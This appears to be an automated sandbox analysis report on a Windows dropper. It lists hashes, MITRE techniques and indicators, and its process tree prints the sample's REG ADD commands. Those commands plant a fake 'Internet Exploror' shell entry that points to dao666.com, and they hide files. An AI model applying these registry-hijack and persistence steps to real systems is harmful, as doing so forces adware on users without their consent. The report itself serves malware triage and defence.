35b2ee61f20c7d658921d7562bccc3cc7a576924155b6de9dc3aba3ccf453df7

Analysis

max time kernel
145s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
24/12/2023, 16:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

067e9caa314e30ebbb0e6e91d463c029.exe
Size

444KB
MD5

067e9caa314e30ebbb0e6e91d463c029
SHA1

5a6aa6f342451fcdc500c0c43cfc9a87060fd64e
SHA256

35b2ee61f20c7d658921d7562bccc3cc7a576924155b6de9dc3aba3ccf453df7
SHA512

615b3093493ccfe6a82bfdadf31aea9ba259a394fde3569fba119c2373592b387a490514c1151a9689212f59e1239bdf4a146f83a603ee5580cf83b7fde7e95f
SSDEEP

12288:wutrzh9xOXk7GMHOJxl/0z+uoqzBTQGteb:wutr5OUStD/0zpJW

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2024	attrib.exe
2380	attrib.exe
1044	attrib.exe
2584	attrib.exe
2284	attrib.exe
4592	attrib.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	msn.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	067e9caa314e30ebbb0e6e91d463c029.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

pid	Process
3792	msn.exe
976	Gaicia.exe
4660	Gaicia.exe

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WinWare\winare.vbs	cmd.exe
File created	C:\Program Files\WinWare\tool.cmd	cmd.exe
File created	C:\Program Files\WinWare\360.cmd	cmd.exe
File created	C:\Program Files\WinWare\361.cmd	cmd.exe
File opened for modification	C:\Program Files\WinWare\Internet Exploror.lnk	cmd.exe
File opened for modification	C:\Program Files\WinWare\tool.cmd	attrib.exe
File opened for modification	C:\Program Files\WinWare\tool.cmd	cmd.exe
File created	C:\Program Files\WinWare\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\361.cmd	attrib.exe
File opened for modification	C:\Program Files\Windows\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\Windows\36OSE.vbs	cmd.exe
File created	C:\Program Files\WinWare\winare.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\361.cmd	cmd.exe
File opened for modification	C:\Program Files\WinWare\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\360.cmd	attrib.exe
File created	C:\Program Files\Windows\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\360.cmd	cmd.exe
File created	C:\Program Files\WinWare\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\36OSE.vbs	cmd.exe
File created	C:\Program Files\WinWare\Internet Exploror.lnk	cmd.exe
File created	C:\Program Files\Windows\360SE.vbs	cmd.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Mail\UltraEdit\is.cmd	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdit\is.cmd	cmd.exe
File created	C:\Windows\Mail\UltraEdit\winare.vbs	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdit\winare.vbs	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2208	sc.exe
3008	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 39 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000015a2f750fe9ee1479ecf0c8cfb11934c00000000020000000000106600000001000020000000a2537bfca3f46db6cd0bb4ee6225db0c42a50340bdeca9d9815613c25c060348000000000e8000000002000020000000f9abb01acec8e081b9e66045eb720e09cdac1a9236152bae35b15cc0bafaa33620000000a317ad9c1e7d814370ac68f75584f0108b584268a7f99f4c4f92559585427f0e4000000075205174e648e2e87fead2504de0d64d6676d20170d4acd9d9cacc40b83b71e390d21e0f53cf85f3a9f827ee73580e38a622356a01aa91c84fa559cf181a9607	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1968307407"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9030a479cd36da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1968307407"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "410230845"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31078093"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1974088720"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1974088720"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31078093"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31078093"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90a1a679cd36da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A0596539-A2C0-11EE-A0B6-667A6D636A0F} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31078093"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000015a2f750fe9ee1479ecf0c8cfb11934c00000000020000000000106600000001000020000000dea1c00bd65ef598d8092384d9da160f6c5a771ea24a8ab786dc5ba02cd4d418000000000e800000000200002000000043808b9974e9320335d0c085f03d61e9f28428e83e11372fe869f1ab2b08f3f9200000008a4006de68b58576ac7eb22e53a793b4cfac5fecfbfe827a5bd49723d5de2b7840000000e8c9c3f3d7e2a148ebc18a7730ebbba56360bae9395dc37b090fe6aee17205cd3aa8e40ac38609c7b4190bd79e87d7bea3ea820a30a726741177f96fdc28333f	iexplore.exe

Modifies registry class 45 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	Conhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	at.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	at.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)"	at.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\	attrib.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	attrib.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	067e9caa314e30ebbb0e6e91d463c029.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	attrib.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	attrib.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\	at.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\	Conhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in"	reg.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4772	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4772	iexplore.exe
4772	iexplore.exe
3756	IEXPLORE.EXE
3756	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4484 wrote to memory of 4000	4484	067e9caa314e30ebbb0e6e91d463c029.exe	91
PID 4484 wrote to memory of 4000	4484	067e9caa314e30ebbb0e6e91d463c029.exe	91
PID 4484 wrote to memory of 4000	4484	067e9caa314e30ebbb0e6e91d463c029.exe	91
PID 4000 wrote to memory of 4640	4000	WScript.exe	93
PID 4000 wrote to memory of 4640	4000	WScript.exe	93
PID 4000 wrote to memory of 4640	4000	WScript.exe	93
PID 4640 wrote to memory of 4772	4640	cmd.exe	95
PID 4640 wrote to memory of 4772	4640	cmd.exe	95
PID 4000 wrote to memory of 2800	4000	WScript.exe	97
PID 4000 wrote to memory of 2800	4000	WScript.exe	97
PID 4000 wrote to memory of 2800	4000	WScript.exe	97
PID 2800 wrote to memory of 4488	2800	cmd.exe	99
PID 2800 wrote to memory of 4488	2800	cmd.exe	99
PID 2800 wrote to memory of 4488	2800	cmd.exe	99
PID 2800 wrote to memory of 1512	2800	cmd.exe	102
PID 2800 wrote to memory of 1512	2800	cmd.exe	102
PID 2800 wrote to memory of 1512	2800	cmd.exe	102
PID 4772 wrote to memory of 3756	4772	iexplore.exe	100
PID 4772 wrote to memory of 3756	4772	iexplore.exe	100
PID 4772 wrote to memory of 3756	4772	iexplore.exe	100
PID 2800 wrote to memory of 3224	2800	cmd.exe	101
PID 2800 wrote to memory of 3224	2800	cmd.exe	101
PID 2800 wrote to memory of 3224	2800	cmd.exe	101
PID 2800 wrote to memory of 1044	2800	cmd.exe	207
PID 2800 wrote to memory of 1044	2800	cmd.exe	207
PID 2800 wrote to memory of 1044	2800	cmd.exe	207
PID 2800 wrote to memory of 1364	2800	cmd.exe	103
PID 2800 wrote to memory of 1364	2800	cmd.exe	103
PID 2800 wrote to memory of 1364	2800	cmd.exe	103
PID 2800 wrote to memory of 4076	2800	cmd.exe	160
PID 2800 wrote to memory of 4076	2800	cmd.exe	160
PID 2800 wrote to memory of 4076	2800	cmd.exe	160
PID 2800 wrote to memory of 4592	2800	cmd.exe	200
PID 2800 wrote to memory of 4592	2800	cmd.exe	200
PID 2800 wrote to memory of 4592	2800	cmd.exe	200
PID 2800 wrote to memory of 3304	2800	cmd.exe	107
PID 2800 wrote to memory of 3304	2800	cmd.exe	107
PID 2800 wrote to memory of 3304	2800	cmd.exe	107
PID 2800 wrote to memory of 1556	2800	cmd.exe	201
PID 2800 wrote to memory of 1556	2800	cmd.exe	201
PID 2800 wrote to memory of 1556	2800	cmd.exe	201
PID 2800 wrote to memory of 1428	2800	cmd.exe	163
PID 2800 wrote to memory of 1428	2800	cmd.exe	163
PID 2800 wrote to memory of 1428	2800	cmd.exe	163
PID 2800 wrote to memory of 1564	2800	cmd.exe	109
PID 2800 wrote to memory of 1564	2800	cmd.exe	109
PID 2800 wrote to memory of 1564	2800	cmd.exe	109
PID 2800 wrote to memory of 916	2800	cmd.exe	111
PID 2800 wrote to memory of 916	2800	cmd.exe	111
PID 2800 wrote to memory of 916	2800	cmd.exe	111
PID 2800 wrote to memory of 2856	2800	cmd.exe	113
PID 2800 wrote to memory of 2856	2800	cmd.exe	113
PID 2800 wrote to memory of 2856	2800	cmd.exe	113
PID 2800 wrote to memory of 412	2800	cmd.exe	112
PID 2800 wrote to memory of 412	2800	cmd.exe	112
PID 2800 wrote to memory of 412	2800	cmd.exe	112
PID 2800 wrote to memory of 1888	2800	cmd.exe	115
PID 2800 wrote to memory of 1888	2800	cmd.exe	115
PID 2800 wrote to memory of 1888	2800	cmd.exe	115
PID 2800 wrote to memory of 2016	2800	cmd.exe	114
PID 2800 wrote to memory of 2016	2800	cmd.exe	114
PID 2800 wrote to memory of 2016	2800	cmd.exe	114
PID 2800 wrote to memory of 3664	2800	cmd.exe	116
PID 2800 wrote to memory of 3664	2800	cmd.exe	116

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2024	attrib.exe
2380	attrib.exe
1044	attrib.exe
2584	attrib.exe
2284	attrib.exe
4592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\067e9caa314e30ebbb0e6e91d463c029.exe
"C:\Users\Admin\AppData\Local\Temp\067e9caa314e30ebbb0e6e91d463c029.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4484
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://dao666.com/index2.html?7xdown
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4640
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://dao666.com/index2.html?7xdown
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4772
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4772 CREDAT:17410 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3756
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      Modifies registry class
      PID:4488
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
      4⤵
      Modifies registry class
      PID:3224
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
      4⤵
      Modifies registry class
      PID:1512
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      Modifies registry class
      PID:1364
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
      4⤵
      PID:4076
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
      4⤵
      PID:1044
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      PID:4592
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      Modifies registry class
      PID:3304
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      PID:1428
